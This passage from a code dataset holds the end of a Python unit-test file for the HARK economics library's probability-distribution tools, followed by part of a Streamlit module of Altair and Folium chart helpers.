IncShkDstn,\n lambda atoms, a, r: r / atoms[0] * a + atoms[1],\n np.array([0, 1, 2, 3, 4, 5]), # an aNrmNow grid?\n 1.05, # an interest rate?\n )\n\n self.assertAlmostEqual(ce9[3], 9.51802, places=HARK_PRECISION)\n\n def test_self_expected_value(self):\n dd_0_1_20 = Normal().discretize(20, method=\"hermite\")\n dd_1_1_40 = Normal(mu=1).discretize(40, method=\"hermite\")\n dd_10_10_100 = Normal(mu=10, sigma=10).discretize(100, method=\"hermite\")\n\n ce1 = expected(dist=dd_0_1_20)\n ce2 = expected(dist=dd_1_1_40)\n ce3 = expected(dist=dd_10_10_100)\n\n self.assertAlmostEqual(ce1[0], 0.0)\n self.assertAlmostEqual(ce2[0], 1.0)\n self.assertAlmostEqual(ce3[0], 10.0)\n\n ce4 = expected(lambda x: 2**x, dd_0_1_20)\n\n self.assertAlmostEqual(ce4[0], 1.27154, places=HARK_PRECISION)\n\n ce5 = expected(func=lambda x: 2 * x, dist=dd_1_1_40)\n\n self.assertAlmostEqual(ce5[0], 2.0)\n\n ce6 = expected(lambda x, y: 2 * x + y, dd_10_10_100, args=(20))\n\n self.assertAlmostEqual(ce6[0], 40.0)\n\n ce7 = expected(\n func=lambda x, y: x + y,\n dist=dd_0_1_20,\n args=(np.hstack([0, 1, 2, 3, 4, 5])),\n )\n\n self.assertAlmostEqual(ce7.flat[3], 3.0)\n\n PermShkDstn = MeanOneLogNormal().discretize(200, method=\"equiprobable\")\n TranShkDstn = MeanOneLogNormal().discretize(200, method=\"equiprobable\")\n IncShkDstn = combine_indep_dstns(PermShkDstn, TranShkDstn)\n\n ce8 = expected(lambda atoms: atoms[0] + atoms[1], dist=IncShkDstn)\n\n 
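# (added note) PermShk and TranShk are both mean-one lognormals, so\n        # E[perm + tran] = 1 + 1 = 2, which the assertion below checks\n        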
self.assertAlmostEqual(ce8, 2.0)\n\n ce9 = expected(\n func=lambda atoms, a, r: r / atoms[0] * a + atoms[1],\n dist=IncShkDstn,\n args=(\n np.array([0, 1, 2, 3, 4, 5]), # an aNrmNow grid?\n 1.05, # an interest rate?\n ),\n )\n\n self.assertAlmostEqual(ce9[3], 9.51802, places=HARK_PRECISION)\n\n def test_self_dist_of_func(self):\n # Function 1 -> 1\n # Approximate the lognormal expectation\n sig = 0.05\n norm = Normal(mu=-(sig**2) / 2, sigma=sig).discretize(131, method=\"hermite\")\n my_logn = norm.dist_of_func(lambda x: np.exp(x))\n exp = my_logn.expected()\n self.assertAlmostEqual(exp, 1.0)\n\n # Function 1 -> n\n # Mean and variance of the normal\n norm = Normal(mu=0.0, sigma=1.0).discretize(5, method=\"hermite\")\n moments = norm.dist_of_func(lambda x: np.array([x, x**2]))\n exp = moments.expected().flatten()\n self.assertAlmostEqual(exp[0], 0.0)\n self.assertAlmostEqual(exp[1], 1.0)\n\n # Function n -> 1\n # Expectation of the sum of two independent normals\n mu_a, mu_b = 1.0, 2.0\n si_a, si_b = 3.0, 4.0\n norm_a = Normal(mu=mu_a, sigma=si_a).discretize(5, method=\"hermite\")\n norm_b = Normal(mu=mu_b, sigma=si_b).discretize(5, method=\"hermite\")\n binorm = combine_indep_dstns(norm_a, norm_b)\n mysum = binorm.dist_of_func(func=lambda x: np.sum(x, axis=0))\n exp = mysum.expected()\n self.assertAlmostEqual(exp[0], mu_a + mu_b)\n\n # Function n -> m\n # Mean and variance of two normals\n moments = binorm.dist_of_func(\n func=lambda x: np.array(\n [x[0], (x[0] - mu_a) ** 2, x[1], (x[1] - mu_b) ** 2]\n ),\n )\n exp = moments.expected()\n self.assertAlmostEqual(exp[0], mu_a)\n self.assertAlmostEqual(exp[1], si_a**2)\n self.assertAlmostEqual(exp[2], mu_b)\n self.assertAlmostEqual(exp[3], si_b**2)\n\n\nclass MatrixDiscreteDistributionTests(unittest.TestCase):\n \"\"\"\n Tests matrix-valued discrete distribution.\n \"\"\"\n\n def setUp(self):\n self.draw_1 = np.array(\n [\n [[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]],\n [[7.0, 8.0, 9.0], [10.0, 11.0, 12.0]],\n ]\n )\n\n self.draw_2 = -1 * self.draw_1\n\n atoms = np.stack([self.draw_1, self.draw_2], axis=-1)\n pmv = np.array([0.5, 0.5])\n\n self.mat_distr = DiscreteDistribution(pmv, atoms, seed=0)\n\n def test_draw(self):\n \"\"\"\n Check that the draws are the matrices we\n want them to be\n \"\"\"\n\n draw = self.mat_distr.draw(1)\n self.assertTrue(np.allclose(draw[..., 0], self.draw_2))\n\n def test_expected(self):\n # Expectation without transformation\n exp = calc_expectation(self.mat_distr)\n\n # Check the expectation is of the shape we want\n self.assertTrue(exp.shape[0] == self.draw_1.shape[0])\n self.assertTrue(exp.shape[1] == self.draw_1.shape[1])\n\n # Check that its value is what we expect\n self.assertTrue(np.allclose(exp, 0.0))\n\n # Expectation of the sum\n exp = calc_expectation(self.mat_distr, func=np.sum)\n self.assertTrue(float(exp) == 0.0)\n\n def test_distr_of_fun(self):\n # A function that receives a (2,n,m) matrix\n # and sums across n, getting a (2,1,m) matrix\n def myfunc(mat):\n return np.sum(mat, axis=1, keepdims=True)\n\n mydistr = distr_of_function(self.mat_distr, myfunc)\n\n # Check the dimensions\n self.assertTrue(mydistr.dim() == (2, 1, 3))\n\n\nclass DistributionClassTests(unittest.TestCase):\n \"\"\"\n Tests for distribution.py sampling distributions\n with default seed.\n \"\"\"\n\n def test_drawMeanOneLognormal(self):\n MeanOneLogNormal().draw(1)[0]\n\n def test_Lognormal(self):\n dist = Lognormal()\n\n dist.draw(1)[0]\n\n dist.draw(100)\n dist.reset()\n\n dist.draw(1)[0]\n\n def test_Normal(self):\n dist = 
Normal()\n\n dist.draw(1)[0]\n\n dist.draw(100)\n dist.reset()\n\n dist.draw(1)[0]\n\n def test_MVNormal(self):\n # Are these tests generator/backend specific?\n dist = MVNormal()\n\n # self.assertTrue(\n # np.allclose(dist.draw(1)[0], np.array([2.76405, 1.40016]))\n # )\n\n dist.draw(100)\n dist.reset()\n\n # self.assertTrue(\n # np.allclose(dist.draw(1)[0], np.array([2.76405, 1.40016]))\n # )\n\n def test_Weibull(self):\n Weibull().draw(1)[0]\n\n def test_Uniform(self):\n uni = Uniform()\n\n Uniform().draw(1)[0]\n\n self.assertEqual(\n calc_expectation(uni.discretize(10, method=\"equiprobable\")), 0.5\n )\n\n uni_discrete = uni.discretize(10, method=\"equiprobable\", endpoints=True)\n\n self.assertEqual(uni_discrete.atoms[0][0], 0.0)\n self.assertEqual(uni_discrete.atoms[0][-1], 1.0)\n self.assertEqual(\n calc_expectation(uni.discretize(10, method=\"equiprobable\")), 0.5\n )\n\n def test_Bernoulli(self):\n Bernoulli().draw(1)[0]\n\n\nclass IndexDistributionClassTests(unittest.TestCase):\n \"\"\"\n Tests for distribution.py sampling distributions\n with default seed.\n \"\"\"\n\n def test_IndexDistribution(self):\n cd = IndexDistribution(Bernoulli, {\"p\": [0.01, 0.5, 0.99]})\n\n conditions = np.array([0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2])\n\n draws = cd.draw(conditions)\n\n self.assertEqual(draws[:4].sum(), 0)\n self.assertEqual(draws[-4:].sum(), 4)\n self.assertEqual(cd[2].p.tolist(), 0.99)\n\n def test_IndexDistribution_approx(self):\n cd = IndexDistribution(\n Lognormal, {\"mu\": [0.01, 0.5, 0.99], \"sigma\": [0.05, 0.05, 0.05]}\n )\n\n approx = cd.discretize(10)\n\n draw = approx[2].draw(5)\n\n self.assertAlmostEqual(draw[1], 2.70826, places=HARK_PRECISION)\n\n def test_IndexDistribution_seeds(self):\n cd = IndexDistribution(Lognormal, {\"mu\": [1, 1], \"sigma\": [1, 1]})\n\n draw_0 = cd[0].draw(1).tolist()\n draw_1 = cd[1].draw(1).tolist()\n\n self.assertNotEqual(draw_0, draw_1)\n\n\nclass MarkovProcessTests(unittest.TestCase):\n \"\"\"\n Tests for MarkovProcess class.\n \"\"\"\n\n def test_draw(self):\n mrkv_array = np.array([[0.75, 0.25], [0.1, 0.9]])\n\n mp = MarkovProcess(mrkv_array)\n\n new_state = mp.draw(np.zeros(100).astype(int))\n\n self.assertEqual(new_state.sum(), 31)\n\n new_state = mp.draw(new_state)\n\n self.assertEqual(new_state.sum(), 45)\n\n\nclass LogNormalToNormalTests(unittest.TestCase):\n \"\"\"\n Tests methods to convert between lognormal and normal parameters.\n \"\"\"\n\n def test_lognorm_to_norm(self):\n avg_ln, std_ln = 1.0, 0.2\n avg_n, std_n = calc_normal_style_pars_from_lognormal_pars(avg_ln, std_ln)\n avg_hat, std_hat = calc_lognormal_style_pars_from_normal_pars(avg_n, std_n)\n\n self.assertAlmostEqual(avg_ln, avg_hat)\n self.assertAlmostEqual(std_ln, std_hat)\n\n def test_norm_to_lognorm(self):\n avg_n, std_n = 1.0, 0.2\n avg_ln, std_ln = calc_lognormal_style_pars_from_normal_pars(avg_n, std_n)\n avg_hat, std_hat = calc_normal_style_pars_from_lognormal_pars(avg_ln, std_ln)\n\n self.assertAlmostEqual(avg_n, avg_hat)\n self.assertAlmostEqual(std_n, std_hat)\n\n\nclass NormalDistTest(unittest.TestCase):\n def test_approx_equiprobable(self):\n mu, sigma = 5.0, 27.0\n\n points = Normal(mu, sigma).discretize(701, method=\"equiprobable\").atoms\n\n self.assertAlmostEqual(np.mean(points), mu, places=7)\n self.assertAlmostEqual(np.std(points), sigma, places=2)\n\n\nclass DiscreteDistributionLabeledTests(unittest.TestCase):\n \"\"\"\n Tests for distribution.py sampling distributions\n with default seed.\n \"\"\"\n\n def test_draw(self):\n 
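# (added note) both atoms are zero, so a draw from this labeled\n        # two-point distribution can only ever return 0\n        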
self.assertEqual(\n DiscreteDistributionLabeled(np.ones(2) / 2, np.zeros(2)).draw(1)[0],\n 0,\n )\n\n def test_self_dist_of_func(self):\n # Function 1 -> 1\n # Approximate the lognormal expectation\n sig = 0.05\n mu = -(sig**2) / 2\n norm = Normal(mu=mu, sigma=sig).discretize(131, method=\"hermite\")\n my_logn = DiscreteDistributionLabeled.from_unlabeled(\n norm.dist_of_func(func=lambda x: np.exp(x)),\n name=\"Lognormal Approximation\", # name of the distribution\n # assign limit properties\n attrs={\"limit\": {\"mu\": mu, \"sigma\": sig}},\n )\n exp = my_logn.expected()\n self.assertAlmostEqual(exp[0], 1.0)\n\n # Function 1 -> n\n # Mean and variance of the normal\n norm = Normal(mu=0.0, sigma=1.0).discretize(5, method=\"hermite\")\n moments = DiscreteDistributionLabeled.from_unlabeled(\n norm.dist_of_func(lambda x: np.vstack([x, x**2])),\n name=\"Moments of Normal Distribution\",\n var_names=[\"mean\", \"variance\"],\n attrs={\"limit\": {\"name\": \"Normal\", \"mu\": 0.0, \"sigma\": 1.0}},\n )\n exp = moments.expected().flatten()\n self.assertAlmostEqual(exp[0], 0.0)\n self.assertAlmostEqual(exp[1], 1.0)\n\n # Function n -> 1\n # Expectation of the sum of two independent normals\n mu_a, mu_b = 1.0, 2.0\n si_a, si_b = 3.0, 4.0\n norm_a = Normal(mu=mu_a, sigma=si_a).discretize(5, method=\"hermite\")\n norm_b = Normal(mu=mu_b, sigma=si_b).discretize(5, method=\"hermite\")\n binorm = combine_indep_dstns(norm_a, norm_b)\n mysum = DiscreteDistributionLabeled.from_unlabeled(\n binorm.dist_of_func(lambda x: np.sum(x, axis=0)), # vectorized sum\n name=\"Sum of two independent normals\",\n )\n exp = mysum.expected()\n self.assertAlmostEqual(exp[0], mu_a + mu_b)\n\n # Function n -> m\n # Mean and variance of two normals\n moments = DiscreteDistributionLabeled.from_unlabeled(\n binorm.dist_of_func(\n lambda x: np.array([x[0], (x[0] - mu_a) ** 2, x[1], (x[1] - mu_b) ** 2])\n ),\n name=\"Moments of two independent normals\",\n var_names=[\"mean_1\", \"variance_1\", \"mean_2\", \"variance_2\"],\n )\n exp = moments.expected()\n self.assertAlmostEqual(exp[0], mu_a)\n self.assertAlmostEqual(exp[1], si_a**2)\n self.assertAlmostEqual(exp[2], mu_b)\n self.assertAlmostEqual(exp[3], si_b**2)\n\n def test_self_expected_value(self):\n PermShkDstn = MeanOneLogNormal().discretize(200, method=\"equiprobable\")\n TranShkDstn = MeanOneLogNormal().discretize(200, method=\"equiprobable\")\n IncShkDstn = combine_indep_dstns(\n PermShkDstn,\n TranShkDstn,\n )\n\n IncShkDstn = DiscreteDistributionLabeled.from_unlabeled(\n IncShkDstn,\n name=\"Distribution of shocks to Income\",\n var_names=[\"perm_shk\", \"tran_shk\"],\n )\n\n ce1 = expected(\n func=lambda dist: 1 / dist[\"perm_shk\"] + dist[\"tran_shk\"],\n dist=IncShkDstn,\n )\n\n self.assertAlmostEqual(ce1, 3.70413, places=HARK_PRECISION)\n\n ce2 = expected(\n func=lambda dist, a, r: r / dist[\"perm_shk\"] * a + dist[\"tran_shk\"],\n dist=IncShkDstn,\n args=(\n np.array([0, 1, 2, 3, 4, 5]), # an aNrmNow grid?\n 1.05, # an interest rate?\n ),\n )\n\n self.assertAlmostEqual(ce2[3], 9.51802, places=HARK_PRECISION)\n\n def test_getters_setters(self):\n # Create some dummy dsnt\n dist = DiscreteDistributionLabeled(\n pmv=np.array([0.5, 0.5]), atoms=np.array([-1.0, 1.0]), var_names=[\"my_var\"]\n )\n\n # Seed\n my_seed = 3\n dist.seed = my_seed\n self.assertTrue(my_seed == dist.seed)\n\n # RNG\n my_rng = np.random.default_rng(5)\n dist.RNG = my_rng\n self.assertTrue(my_rng == dist.RNG)\n\n def test_combine_labeled_dist(self):\n # Create some dstns\n a = 
DiscreteDistributionLabeled(\n pmv=np.array([0.1, 0.9]), atoms=np.array([-1.0, 1.0]), var_names=\"a\"\n )\n b = DiscreteDistributionLabeled(\n pmv=np.array([0.5, 0.5]), atoms=np.array([0.0, 1.0]), var_names=\"b\"\n )\n c = DiscreteDistributionLabeled(\n pmv=np.array([0.3, 0.7]), atoms=np.array([0.5, 1.0]), var_names=\"c\"\n )\n\n # Test some combinations\n abc = combine_indep_dstns(a, b, c)\n # Check the order\n self.assertTrue(\n np.all(\n np.isclose(\n abc.expected(),\n np.concatenate([a.expected(), b.expected(), c.expected()]),\n )\n )\n )\n # Check by label\n self.assertEqual(abc.expected(lambda x: x[\"b\"]), b.expected()[0])\n self.assertAlmostEqual(\n abc.expected(lambda x: x[\"a\"] * x[\"c\"]), a.expected()[0] * c.expected()[0]\n )\n\n # Combine labeled and non labeled distribution\n x = DiscreteDistribution(pmv=np.array([0.5, 0.5]), atoms=np.array([1.0, 2.0]))\n\n xa = combine_indep_dstns(x, a)\n self.assertFalse(isinstance(xa, DiscreteDistributionLabeled))\n self.assertTrue(\n np.all(xa.expected() == np.concatenate([x.expected(), a.expected()]))\n )\n\n # Combine multidimensional labeled\n d = DiscreteDistributionLabeled(\n pmv=np.array([0.3, 0.7]), atoms=np.array([-0.5, -1.0]), var_names=\"d\"\n )\n e = DiscreteDistributionLabeled(\n pmv=np.array([0.3, 0.7]), atoms=np.array([0.0, -1.0]), var_names=\"e\"\n )\n de = combine_indep_dstns(d, e)\n\n abcde = combine_indep_dstns(abc, de)\n self.assertTrue(\n np.allclose(\n abcde.expected(\n lambda x: np.array([x[\"d\"], x[\"e\"], x[\"a\"], x[\"b\"], x[\"c\"]])\n ),\n np.concatenate([de.expected(), abc.expected()]),\n )\n )\n\n\nclass labeled_transition_tests(unittest.TestCase):\n def setUp(self) -> None:\n return super().setUp()\n\n def test_expectation_transformation(self):\n # Create a basic labeled distribution\n base_dist = DiscreteDistributionLabeled(\n pmv=np.array([0.5, 0.5]),\n atoms=np.array([[1.0, 2.0], [3.0, 4.0]]),\n var_names=[\"a\", \"b\"],\n )\n\n # Define a transition function\n def transition(shocks, state):\n state_new = {}\n state_new[\"m\"] = state[\"m\"] * shocks[\"a\"]\n state_new[\"n\"] = state[\"n\"] * shocks[\"b\"]\n return state_new\n\n m = xr.DataArray(np.linspace(0, 10, 11), name=\"m\", dims=(\"grid\",))\n n = xr.DataArray(np.linspace(0, -10, 11), name=\"n\", dims=(\"grid\",))\n state_grid = xr.Dataset({\"m\": m, \"n\": n})\n\n # Evaluate labeled transformation\n\n # Direct expectation\n exp1 = base_dist.expected(transition, state=state_grid)\n # Expectation after transformation\n new_state_dstn = base_dist.dist_of_func(transition, state=state_grid)\n # TODO: needs a cluncky identity function with an extra argument because\n # DDL.expected() behavior is very different with and without kwargs.\n # Fix!\n exp2 = new_state_dstn.expected(lambda x, unused: x, unused=0)\n\n assert np.all(exp1[\"m\"] == exp2[\"m\"]).item()\n assert np.all(exp1[\"n\"] == exp2[\"n\"]).item()\n","repo_name":"econ-ark/HARK","sub_path":"HARK/tests/test_distribution.py","file_name":"test_distribution.py","file_ext":"py","file_size_in_byte":21139,"program_lang":"python","lang":"en","doc_type":"code","stars":297,"dataset":"github-code","pt":"35"} +{"seq_id":"71816336742","text":"import plotly.graph_objects as go\nimport plotly.express as px\nimport streamlit as st\nimport pandas as pd\nimport numpy as np\nimport altair as alt\nimport folium\nfrom streamlit_folium import st_folium\n\nfrom helper import round_to_nearest\n\n\ndef map_chart(df, settings):\n initial_latitude = df[settings[\"latitude\"]].iloc[0]\n initial_longitude = 
df[settings[\"longitude\"]].iloc[0]\n    map_object = folium.Map(\n        location=[initial_latitude, initial_longitude],\n        zoom_start=settings[\"zoom_start\"],\n    )\n\n    for index, row in df.iterrows():\n        latitude = row[settings[\"latitude\"]]\n        longitude = row[settings[\"longitude\"]]\n        folium.Marker(\n            location=[latitude, longitude],\n            popup=row[settings[\"popup\"]],\n            tooltip=row[settings[\"tooltip\"]],\n        ).add_to(map_object)\n    st_data = st_folium(map_object, width=settings[\"width\"], height=settings[\"height\"])\n    return st_data\n\n\ndef line_chart(df, settings):\n    title = settings[\"title\"] if \"title\" in settings else \"\"\n    if \"x_dt\" not in settings:\n        settings[\"x_dt\"] = \"Q\"\n    if \"y_dt\" not in settings:\n        settings[\"y_dt\"] = \"Q\"\n    if not (\"opacity\" in settings):\n        settings[\"opacity\"] = 0.5\n\n    if \"color\" in settings and settings[\"color\"] is not None:\n        if \"hide_legend\" in settings:\n            # bug fix: the list of output colours is the scale's range; domain\n            # describes data values, so domain=[\"grey\"] never coloured the line\n            color = alt.Color(\n                settings[\"color\"], legend=None, scale=alt.Scale(range=[\"grey\"])\n            )\n        else:\n            color = alt.Color(\n                settings[\"color\"], scale=alt.Scale(scheme=\"redblue\", reverse=True)\n            )\n        chart = (\n            alt.Chart(df)\n            .mark_line(width=2, clip=True, opacity=settings[\"opacity\"])\n            .encode(\n                x=alt.X(\n                    f\"{settings['x']}:{settings['x_dt']}\",\n                    scale=alt.Scale(domain=settings[\"x_domain\"]),\n                ),\n                y=alt.Y(\n                    f\"{settings['y']}:{settings['y_dt']}\",\n                    scale=alt.Scale(domain=settings[\"y_domain\"]),\n                ),\n                color=color,\n                tooltip=settings[\"tooltip\"],\n            )\n        )\n    else:\n        chart = (\n            alt.Chart(df)\n            .mark_line(width=2, clip=True, opacity=0.5)\n            .encode(\n                x=alt.X(\n                    f\"{settings['x']}:{settings['x_dt']}\",\n                    scale=alt.Scale(domain=settings[\"x_domain\"]),\n                ),\n                y=alt.Y(\n                    f\"{settings['y']}:{settings['y_dt']}\",\n                    scale=alt.Scale(domain=settings[\"y_domain\"]),\n                ),\n                tooltip=settings[\"tooltip\"],\n            )\n        )\n\n    if \"compare_line\" in settings:\n        df2 = df[df[\"year\"] == settings[\"compare_line\"]]\n        chart += (\n            alt.Chart(df2)\n            .mark_line(width=2, clip=True, color=\"red\")\n            .encode(\n                x=alt.X(\n                    f\"{settings['x']}:{settings['x_dt']}\",\n                    scale=alt.Scale(domain=settings[\"x_domain\"]),\n                ),\n                y=alt.Y(\n                    f\"{settings['y']}:{settings['y_dt']}\",\n                    scale=alt.Scale(domain=settings[\"y_domain\"]),\n                ),\n                tooltip=settings[\"tooltip\"],\n            )\n        )\n\n    if \"regression\" in settings:\n        line = chart.transform_regression(settings[\"x\"], settings[\"y\"]).mark_line()\n        plot = (chart + line).properties(\n            width=settings[\"width\"], height=settings[\"height\"], title=title\n        )\n    else:\n        plot = chart.properties(\n            width=settings[\"width\"], height=settings[\"height\"], title=title\n        )\n    st.altair_chart(plot)\n\n\ndef scatter_plot(df, settings):\n    title = settings[\"title\"] if \"title\" in settings else \"\"\n    chart = (\n        alt.Chart(df)\n        .mark_circle(\n            size=60,\n        )\n        .encode(\n            x=alt.X(settings[\"x\"], scale=alt.Scale(domain=settings[\"domain\"])),\n            y=alt.Y(settings[\"y\"], scale=alt.Scale(domain=settings[\"domain\"])),\n            tooltip=settings[\"tooltip\"],\n            color=alt.Color(\n                settings[\"color\"], sort=\"ascending\", scale=alt.Scale(scheme=\"bluered\")\n            ),\n        )\n        .interactive()\n    )\n    plot = chart.properties(\n        width=settings[\"width\"], height=settings[\"height\"], title=title\n    )\n    st.altair_chart(plot)\n\n\ndef time_series_bar(df, settings):\n    chart = (\n        alt.Chart(df)\n        .mark_bar(size=settings[\"size\"], clip=True)\n        .encode(\n            x=alt.X(\n                f\"{settings['x']}:T\",\n                title=settings[\"x_title\"],\n                # bug fix: alt.Scale takes no axis argument; the tick format\n                # belongs on the encoding's own axis\n                axis=alt.Axis(format=\"%b %Y\"),\n                scale=alt.Scale(domain=settings[\"x_domain\"]),\n            ),\n            
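# (added note) x is encoded as temporal, so ticks render like \"Jan 2020\"\n            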
y=alt.Y(f\"{settings['y']}:Q\", title=settings[\"y_title\"]),\n tooltip=settings[\"tooltip\"],\n )\n )\n plot = chart.properties(\n width=settings[\"width\"], height=settings[\"height\"], title=settings[\"title\"]\n )\n st.altair_chart(plot)\n\n\ndef time_series_line(df, settings):\n if \"x_domain\" in settings:\n xax = alt.X(\n f\"{settings['x']}:T\",\n title=settings[\"x_title\"],\n scale=alt.Scale(domain=settings[\"x_domain\"]),\n )\n else:\n xax = alt.X(f\"{settings['x']}:T\", title=settings[\"x_title\"])\n\n if settings[\"y_domain\"][0] != settings[\"y_domain\"][1]:\n yax = alt.Y(\n f\"{settings['y']}:Q\",\n title=settings[\"y_title\"],\n scale=alt.Scale(domain=settings[\"y_domain\"]),\n )\n else:\n yax = alt.Y(f\"{settings['y']}:Q\", title=settings[\"y_title\"])\n\n if \"color\" in settings:\n chart = (\n alt.Chart(df)\n .mark_line(clip=True)\n .encode(\n x=xax,\n y=yax,\n color=f\"{settings['color']}:N\",\n tooltip=settings[\"tooltip\"],\n )\n )\n else:\n chart = (\n alt.Chart(df)\n .mark_line(clip=True)\n .encode(x=xax, y=yax, tooltip=settings[\"tooltip\"])\n )\n\n if \"h_line\" in settings:\n chart += (\n alt.Chart(df)\n .mark_line(clip=True, color=\"red\")\n .encode(x=xax, y=settings[\"h_line\"], tooltip=settings[\"h_line\"])\n )\n\n if \"symbol_size\" in settings:\n if not (\"symbol_opacity\" in settings):\n settings[\"symbol_opacity\"] = 0.6\n if \"color\" in settings:\n chart += (\n alt.Chart(df)\n .mark_circle(\n size=settings[\"symbol_size\"],\n clip=True,\n opacity=settings[\"symbol_opacity\"],\n )\n .encode(\n x=xax,\n y=yax,\n color=f\"{settings['color']}:N\",\n tooltip=settings[\"tooltip\"],\n )\n )\n else:\n chart += (\n alt.Chart(df)\n .mark_circle(\n size=settings[\"symbol_size\"], opacity=settings[\"symbol_opacity\"]\n )\n .encode(x=xax, y=yax, tooltip=settings[\"tooltip\"])\n )\n plot = chart.properties(\n width=settings[\"width\"], height=settings[\"height\"], title=settings[\"title\"]\n )\n st.altair_chart(plot)\n\n\ndef time_series_chart(df, settings):\n # line = alt.Chart(df_line).mark_line(color= 'red').encode(\n # x= 'x',\n # y= 'y'\n # )\n\n title = settings[\"title\"] if \"title\" in settings else \"\"\n if \"x_title\" not in settings:\n settings[\"x_title\"] = \"\"\n if \"symbol_size\" not in settings:\n settings[\"symbol_size\"] = 0\n if \"rolling_avg_window\" not in settings:\n settings[\"rolling_avg_window\"] = 0\n plot = (\n alt.Chart(df)\n .mark_line(point=alt.OverlayMarkDef(color=\"blue\", size=settings[\"symbol_size\"]))\n .encode(\n x=alt.X(\n f\"{settings['x']}:T\", title=settings[\"x_title\"]\n ), # , scale=alt.Scale(domain=settings['x_domain']), ),\n y=alt.Y(\n f\"{settings['y']}:Q\",\n scale=alt.Scale(domain=settings[\"y_domain\"]),\n title=settings[\"y_title\"],\n ),\n tooltip=settings[\"tooltip\"],\n )\n )\n if \"show_regression\" in settings:\n if len(df) > 2 and settings[\"show_regression\"]:\n line = plot.transform_regression(settings[\"x\"], settings[\"y\"]).mark_line(\n color=\"orange\"\n )\n plot += line\n if \"show_average\" in settings:\n if settings[\"show_average\"]:\n avg = df[settings[\"y\"]].mean()\n df_avg = pd.DataFrame(\n {\n \"x\": [df[settings[\"x\"]].min(), df[settings[\"x\"]].max()],\n \"y\": [avg, avg],\n }\n )\n line = (\n alt.Chart(df_avg)\n .mark_line(color=\"red\")\n .encode(\n x=\"x\",\n y=\"y\",\n )\n )\n plot += line\n if settings[\"rolling_avg_window\"] > 0:\n df[\"ma\"] = (\n df[settings[\"y\"]].rolling(window=settings[\"rolling_avg_window\"]).mean()\n )\n # Create the chart\n line = (\n alt.Chart(df)\n 
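# (added note) overlays the rolling mean computed above as a thicker\n            # green layer on top of the base series\n            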
.mark_line(color=\"green\")\n .encode(x=f\"{settings['x']}:T\", y=f\"ma:Q\", strokeWidth=alt.value(3))\n )\n plot += line\n\n plot = plot.properties(\n width=settings[\"width\"], height=settings[\"height\"], title=title\n )\n st.altair_chart(plot)\n\n\ndef heatmap(df, settings):\n title = settings[\"title\"] if \"title\" in settings else \"\"\n if not (\"show_numbers\" in settings):\n settings[\"show_numbers\"] = True\n if not (\"color_scheme\" in settings):\n settings[\"color_scheme\"] = \"viridis\"\n\n plot = (\n alt.Chart(df)\n .mark_rect()\n .encode(\n # x=alt.X(settings[\"x\"], sort=list(cn.MONTHS_REV_DICT.keys())),\n x=alt.X(settings[\"x\"]),\n y=alt.Y(\n settings[\"y\"],\n sort=alt.EncodingSortField(field=\"year\", order=\"descending\"),\n ),\n color=alt.Color(\n f\"{settings['color']}:Q\",\n scale=alt.Scale(range=[\"lightblue\", \"darkred\"]),\n ),\n tooltip=settings[\"tooltip\"],\n )\n )\n\n if settings[\"show_numbers\"]:\n plot += plot.mark_text().encode(\n text=settings[\"color\"], color=alt.value(\"black\")\n )\n\n plot = plot.properties(width=settings[\"width\"], title=title)\n st.altair_chart(plot)\n\n\ndef bar_chart(df: pd.DataFrame, settings: dict):\n if \"title\" not in settings:\n settings[\"title\"] = \"\"\n if \"tooltip\" not in settings:\n settings[\"tooltip\"] = [settings[\"x\"], settings[\"y\"]]\n if \"bar_width\" not in settings:\n settings[\"bar_width\"] = 10\n if df[settings[\"x\"]].dtype == \"datetime64[ns]\":\n x_axis = alt.X(\n f\"{settings['x']}:T\",\n axis=alt.Axis(title=settings[\"x_title\"], format=settings[\"format_x\"]),\n )\n else:\n x_axis = alt.X(f\"{settings['x']}:N\")\n if \"x_domain\" in settings:\n x_axis.axis.scale = alt.Scale(domain=settings[\"x_domain\"])\n y_axis = alt.Y(settings[\"y\"], title=settings[\"y_title\"])\n if \"y_domain\" in settings:\n y_axis.axis.scale = alt.Scale(domain=settings[\"y_domain\"])\n plot = (\n alt.Chart(df)\n .mark_bar(size=settings[\"bar_width\"])\n .encode(x=x_axis, y=y_axis, tooltip=settings[\"tooltip\"])\n )\n if \"h_line\" in settings:\n plot += (\n alt.Chart(df)\n .mark_line(color=\"red\")\n .encode(\n x=x_axis,\n y=settings[\"h_line\"],\n )\n )\n\n plot = plot.properties(\n title=settings[\"title\"], width=settings[\"width\"], height=settings[\"height\"]\n )\n\n return st.altair_chart(plot)\n\n\ndef box_plot(df: pd.DataFrame, settings: dict):\n if \"title\" not in settings:\n settings[\"title\"] = \"\"\n x_axis = alt.X(f\"{settings['x']}:N\", title=settings[\"x_title\"])\n y_axis = alt.Y(settings[\"y\"], title=settings[\"y_title\"])\n plot = alt.Chart(df).mark_boxplot().encode(x=x_axis, y=y_axis)\n if \"h_line\" in settings:\n plot += (\n alt.Chart(df)\n .mark_line(color=\"red\")\n .encode(\n x=f\"{settings['x']}:N\",\n y=settings[\"h_line\"],\n )\n )\n\n plot = plot.properties(\n title=settings[\"title\"], width=settings[\"width\"], height=settings[\"height\"]\n )\n\n return st.altair_chart(plot)\n\n\ndef histogram(df: pd.DataFrame, settings: dict):\n def get_x_domain():\n x_domain = [df[settings[\"x\"]].min(), df[settings[\"x\"]].max()]\n if x_domain[0] % 2 != 0:\n x_domain[0] -= 1\n if x_domain[1] % 2 != 0:\n x_domain[1] += 1\n return x_domain\n\n if \"maxbins\" not in settings:\n rounded_num = round_to_nearest(len(df), 10)\n settings[\"maxbins\"] = rounded_num\n if \"x_domain\" not in settings:\n settings[\"x_domain\"] = get_x_domain()\n if \"title\" not in settings:\n settings[\"title\"] = \"\"\n\n plot = (\n alt.Chart(df)\n .mark_bar()\n .encode(\n x=alt.X(\n f\"{ settings['x'] }:Q\",\n 
